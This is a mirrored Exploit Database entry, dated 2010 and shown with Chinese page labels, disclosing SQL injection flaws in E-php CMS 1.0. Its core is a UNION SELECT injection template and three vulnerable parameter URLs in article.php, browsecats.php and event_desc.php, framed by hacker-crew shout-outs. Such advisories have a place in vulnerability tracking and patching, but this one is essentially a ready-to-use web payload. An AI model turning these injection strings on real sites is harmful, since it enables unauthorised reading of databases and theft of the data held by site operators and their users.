E-PHP CMS – SQL Injection

• Exploit Database
• 35 阅读

• 作者： Th3 RDX
  日期： 2010-03-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11864/

• # Exploit Title: E-php CMS SQL Injection Vulnerability
  # Date: 22-03-2010
  # Author: Th3 RDX
  # Software Link:
  # Version: 1.0
  # Tested on: Demo Site
  # category: webapp
  # Code :
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Sp3c1al Th4nkz to : R00T and R45C4L
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  ##############################################################################
  %//
  
  ----- [ Founder ] -----
  
  Th3 RDX
  
  ----- [ E - mail ] -----
  
  th3rdx@gmail.com
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [Title] -----
  
  E-php CMS SQL Injection Vulnerability
  
  ----- [ Vendor ] -----
  
  http://www.ephpscripts.com/content-management-system.php
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [ Exploit (s) ] -----
  
  Put [CODE] = SQL Injection Code
  
  {e.g = article.php?es_id=11+and+1=0+ Union Select 1 , UNHEX(HEX([visible]))
  ,3,4,5,6,7,8,9,10,11,12 (tables & column) }
  
  [SQLi] http://server/e-php/article.php?es_id=11[CODE]
  
  [SQLi] http://server/e-php/browsecats.php?cid=6[CODE]
  
  [SQLi] http://server/e-php/event_desc.php?es_id=4[CODE]
  
  
  %\\
  ##############################################################################
  
  
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Bug discovered : 22 March 2010
  
  finish(0);
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=